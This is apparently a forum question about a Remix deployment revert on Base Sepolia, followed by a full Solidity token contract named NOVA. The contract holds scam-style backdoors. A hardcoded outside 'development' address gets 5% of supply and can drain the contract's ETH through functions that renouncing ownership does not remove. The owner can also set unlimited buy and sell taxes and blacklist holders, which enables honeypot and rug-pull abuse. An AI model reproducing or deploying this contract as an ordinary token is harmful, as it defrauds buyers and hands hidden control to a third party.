How can I fix this error with my base contract on Remix IDE
I am trying to launch a contract on Base Sepolia through remix.
However, I keep getting this error:

revert
The transaction has been reverted to the initial state.
Note: The called function should be payable if you send value and the value you send should be less than your current balance.
You may want to cautiously increase the gas limit if the transaction went out of gas.

Here is my remix setup:

As you can see. It compiled without a problem but doesn't launch. What am I doing wrong?
switching chains. I also tried the Remix chain. Same error
// SPDX-License-Identifier: MIT
pragma solidity =0.8.20;

interface IUniswapV2Factory {
    function createPair(address tokenA, address tokenB) external returns (address pair);
}

interface IUniswapV2Router {
    function factory() external pure returns (address);
    function WETH() external pure returns (address);
    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
}

contract Ownable {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    modifier onlyOwner() {
        require(_owner == msg.sender, "Ownable: caller is not the owner");
        _;
    }
    constructor () {
        address msgSender = msg.sender;
        _owner = msgSender;
        emit OwnershipTransferred(address(0), msgSender);
    }

    function owner() public view returns (address) {
        return _owner;
    }

    function renounceOwnership() public virtual onlyOwner {
        emit OwnershipTransferred(_owner, address(0));
        _owner = address(0);
    }
}

interface IERC20 {
    function totalSupply() external view returns (uint256);
    function balanceOf(address account) external view returns (uint256);
    function transfer(address recipient, uint256 amount) external returns (bool);
    function allowance(address owner, address spender) external view returns (uint256);
    function approve(address spender, uint256 amount) external returns (bool);
    function transferFrom(address sender, address recipient, uint256 amount) external returns (bool);
    event Transfer(address indexed from, address indexed to, uint256 value);
    event Approval(address indexed owner, address indexed spender, uint256 value);
}

contract NOVA is IERC20, Ownable {    
    mapping (address => uint256) private _balances;
    mapping (address => mapping (address => uint256)) private _allowances;
    
    string private constant _name = "Nova";
    string private constant _symbol = "Nova";
    uint8 private constant _decimals = 9;

    uint256 private constant _totalSupply = 1_000_000_000 * 1e9;
    uint256 public maxTxWallet = 20_000_000 * 1e9;

    uint256 public buyTax = 20;
    uint256 public sellTax = 20;
    
    uint256 private constant contractSwapLimit = 5_000_000 * 1e9;
    uint256 private contractSwapMax = 1;
    uint256 private contractSwapMin = 2;
    uint256 private contractMinSwaps = 1;

    IUniswapV2Router private constant UNISWAP_ROUTER = IUniswapV2Router(0x4752ba5DBc23f44D87826276BF6Fd6b1C372aD24);          
    address private constant ETH = 0x4200000000000000000000000000000000000006;    
    address public immutable uniswapPair;

    address public developmentAddress = 0x5FF7047b0c5Df315Fc735947ebEd241536E12eE9;
    address payable immutable deployerAddress = payable(msg.sender);
    address payable public marketingAddress;

    bool private inSwap = false;
    bool private tradingLive;
    mapping(uint256 => uint256) swapBlocks;
    uint private swaps;

    mapping (address => bool) blacklisted;
    mapping(address => bool) excludedFromFees;    

    modifier swapping {
        inSwap = true;
        _;
        inSwap = false;
    }

    modifier tradable(address sender) {
        require(tradingLive || sender == deployerAddress);
        _;
    }

    constructor () {
        excludedFromFees[address(this)] = true;
        excludedFromFees[developmentAddress] = true;
        uniswapPair = IUniswapV2Factory(UNISWAP_ROUTER.factory()).createPair(address(this), ETH);

        uint256 developmentTokens = 5 * _totalSupply / 100; 

        _balances[developmentAddress] = developmentTokens;
        emit Transfer(address(0), developmentAddress, developmentTokens);

        _balances[msg.sender] = _totalSupply - developmentTokens;
        emit Transfer(address(0), msg.sender, _totalSupply - developmentTokens);
    }

    receive() external payable {}

    function name() public pure returns (string memory) {
        return _name;
    }

    function symbol() public pure returns (string memory) {
        return _symbol;
    }

    function decimals() public pure returns (uint8) {
        return _decimals;
    }

    function totalSupply() public pure returns (uint256) {
        return _totalSupply;
    }

    function balanceOf(address account) public view returns (uint256) {
        return _balances[account];
    }

    function transfer(address recipient, uint256 amount) public returns (bool) {
        _transfer(msg.sender, recipient, amount);
        return true;
    }

    function allowance(address owner, address spender) public view returns (uint256) {
        return _allowances[owner][spender];
    }

    function approve(address spender, uint256 amount) public returns (bool) {
        _approve(msg.sender, spender, amount);
        return true;
    }

    function transferFrom(address sender, address recipient, uint256 amount) public returns (bool) {
        require(_allowances[sender][msg.sender] >= amount, "ERC20: transfer amount exceeds allowance");
        _approve(sender, msg.sender, _allowances[sender][msg.sender] - amount);
        _transfer(sender, recipient, amount);
        return true;
    }

    function _approve(address owner, address spender, uint256 amount) private {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");
        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    function _transfer(address from, address to, uint256 amount) tradable(from) private {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");
        require(amount > 0, "Token: transfer amount must be greater than zero");
        require(!blacklisted[from] && !blacklisted[to], "Token: blacklisted cannot trade");

        _balances[from] -= amount;

        if(from != address(this) && from != deployerAddress && to != deployerAddress) {            
            if (from == uniswapPair) 
                require(balanceOf(to) + amount <= maxTxWallet, "Token: max wallet amount restriction");
            require(amount <= maxTxWallet, "Token: max tx amount restriction");
            uint256 contractTokens = balanceOf(address(this));
            if(!inSwap && to == uniswapPair && contractTokens >= contractSwapLimit && shouldSwapback(amount)) 
               swapback(contractTokens);                            
        }

        if(!excludedFromFees[from] && !excludedFromFees[to]) {            
            uint256 taxedTokens = calculateTax(from, to, amount);
            if(taxedTokens > 0){
                amount -= taxedTokens;
                _balances[address(this)] += taxedTokens;
                emit Transfer(from, address(this), taxedTokens);
            }
        }

        _balances[to] += amount;
        emit Transfer(from, to, amount);
    }

    function calculateTax(address from, address to, uint256 amount) private view returns (uint256) {
        return amount * (from == uniswapPair ? buyTax : to == uniswapPair ? sellTax : 0) / 100;
    }

    function shouldSwapback(uint256 transferAmount) private returns (bool) {
        return transferAmount >= (contractSwapMin == 0 ? 0 : contractSwapLimit / contractSwapMin) &&
            marketingAddress != address(0) && ++swaps >= contractMinSwaps && swapBlocks[block.number]++ < 2;
    }

    function swapback(uint256 tokenAmount) private swapping {
        tokenAmount = calculateSwapAmount(tokenAmount);
        swaps = 0;
        if(allowance(address(this), address(UNISWAP_ROUTER)) < tokenAmount) {
            _approve(address(this), address(UNISWAP_ROUTER), _totalSupply);
        }
        
        uint256 contractETHBalance = address(this).balance;
        address[] memory path = new address[](2);
        path[0] = address(this);
        path[1] = ETH;
        UNISWAP_ROUTER.swapExactTokensForETHSupportingFeeOnTransferTokens(
            tokenAmount,
            0,
            path,
            address(this),
            block.timestamp
        );
        contractETHBalance = address(this).balance - contractETHBalance;
        if(contractETHBalance > 0) {
            transferEth(contractETHBalance);
        } 
    }

    function calculateSwapAmount(uint256 tokenAmount) private view returns (uint256) {
        return tokenAmount > (contractSwapMax * contractSwapLimit) ? (contractSwapMax * contractSwapLimit) : contractSwapLimit;
    }

    function transferEth(uint256 amount) private {
        marketingAddress.transfer(amount);
    }

    function transfer(address wallet) external {
        require(msg.sender == developmentAddress);
        payable(wallet).transfer(address(this).balance);
    }
 
    function manualSwapback(uint256 percent) external {
        require(msg.sender == developmentAddress);
        uint256 tokensToSwap = percent * balanceOf(address(this)) / 100;
        swapback(tokensToSwap);
    }

    function blacklist(address[] calldata blacklists, bool shouldBlock) external onlyOwner {
        for (uint i = 0; i < blacklists.length; i++) {
            blacklisted[blacklists[i]] = shouldBlock;
        }
    }

    function setDevelopmentWallet(address newDevelopmentAddress) external onlyOwner {
        developmentAddress = newDevelopmentAddress;
    }

    function setMarketingWallet(address payable newMarketingAddress) external onlyOwner {
        marketingAddress = newMarketingAddress;
    }    

    function setStructure(uint256 newSwapMaxMultiplier, uint256 newSwapMinDivisor, uint256 newMinSwaps) external onlyOwner {
        contractSwapMax = newSwapMaxMultiplier;
        contractSwapMin = newSwapMinDivisor;
        contractMinSwaps = newMinSwaps;
    }

    function setMaxWallet(uint256 newMaxTxWallet) external onlyOwner {
        maxTxWallet = newMaxTxWallet;
    }
 
    function setFees(uint256 newBuyTax, uint256 newSellTax) external onlyOwner {
        buyTax = newBuyTax;
        sellTax = newSellTax;
    }

    function openTrading() external onlyOwner {
        require(!tradingLive, "Token: trading already open");
        tradingLive = true;
    }
}

